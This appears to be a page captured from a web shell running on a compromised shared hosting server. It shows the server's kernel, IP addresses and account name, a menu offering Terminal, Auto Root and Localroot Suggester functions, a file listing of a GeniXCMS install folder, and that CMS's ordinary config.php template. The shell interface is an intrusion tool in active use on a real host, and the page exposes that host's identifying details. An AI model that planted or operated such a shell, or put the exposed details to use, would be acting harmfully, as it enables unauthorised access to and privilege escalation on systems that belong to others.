Linux server64.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
Server IP : 198.54.116.248 & Your IP : 216.73.216.118
Domains :
Cant Read [ /etc/named.conf ]
User : tailxcij
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
genix /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2026-04-10 22:26
php53
[ DIR ]
drwxr-xr-x
2026-04-10 22:26
php56
[ DIR ]
drwxr-xr-x
2026-04-10 22:26
php71
[ DIR ]
drwxr-xr-x
2026-04-10 22:26
php81
[ DIR ]
drwxr-xr-x
2026-04-10 22:26
php82
[ DIR ]
drwxr-xr-x
2026-04-10 22:26
_edit.php
3.58
KB
-rw-r--r--
2026-04-08 11:46
_edit.xml
433
B
-rw-r--r--
2026-04-08 11:46
changelog.txt
8.89
KB
-rw-r--r--
2026-04-10 11:47
config.php
1.78
KB
-rw-r--r--
2026-04-10 11:47
fileindex.php
241
B
-rw-r--r--
2026-04-09 11:53
genix.sql
11.79
KB
-rw-r--r--
2026-04-10 11:47
genix.zip
8.24
MB
-rw-r--r--
2026-04-10 11:47
import.php
3.4
KB
-rw-r--r--
2026-04-10 11:59
info.xml
2.09
KB
-rw-r--r--
2026-04-10 11:47
install.js
924
B
-rw-r--r--
2021-12-23 11:54
install.php
7.06
KB
-rw-r--r--
2026-04-10 11:59
install.xml
989
B
-rw-r--r--
2021-12-23 11:54
md5
4.15
KB
-rw-r--r--
2026-04-10 11:59
notes.txt
126
B
-rw-r--r--
2026-04-09 11:53
Save
Rename
<?php if (defined('GX_LIB') === false) die("Direct Access Not Allowed!"); /** * GeniXCMS - Content Management System * * PHP Based Content Management System and Framework * * @package GeniXCMS * @since 0.0.1 build date 20140925 * @version 2.2.1 * * @link https://github.com/GeniXCMS/GeniXCMS * @author Puguh Wijayanto <[EMAIL_ADDRESS]> * @author GeniXCMS <genixcms@gmail.com> * @copyright 2014-2023 Puguh Wijayanto * @copyright 2023-2026 GeniXCMS * @license http://www.opensource.org/licenses/mit-license.php MIT * */ error_reporting(E_ALL); // DB CONFIG !defined('DB_HOST') ? define('DB_HOST', '[[softdbhost]]') : null; !defined('DB_NAME') ? define('DB_NAME', '[[softdb]]') : null; !defined('DB_PASS') ? define('DB_PASS', '[[softdbpass]]') : null; !defined('DB_USER') ? define('DB_USER', '[[softdbuser]]') : null; !defined('DB_DRIVER') ? define('DB_DRIVER', 'mysql') : null; !defined('SMART_URL') ? define('SMART_URL', false) : null; !defined('GX_URL_PREFIX') ? define('GX_URL_PREFIX', '.html') : null; !defined('ADMIN_DIR') ? define('ADMIN_DIR', 'gxadmin') : null; !defined('USE_MEMCACHED') ? define('USE_MEMCACHED', false) : null; !defined('SITE_ID') ? define('SITE_ID', '[[SITE_ID]]') : null; !defined('DEBUG') ? define('DEBUG', false) : null; !defined('SESSION_EXPIRES') ? define('SESSION_EXPIRES', 720) : null; !defined('SESSION_DB') ? define('SESSION_DB', false) : null; ##################################// # DON't REMOVE or EDIT THIS. # ================================== # YOU WON'T BE ABLE TO LOG IN # IF IT CHANGED. PLEASE BE AWARE ##################################// !defined('SECURITY_KEY') ? define('SECURITY_KEY', '[[SECURITY_KEY]]') : null;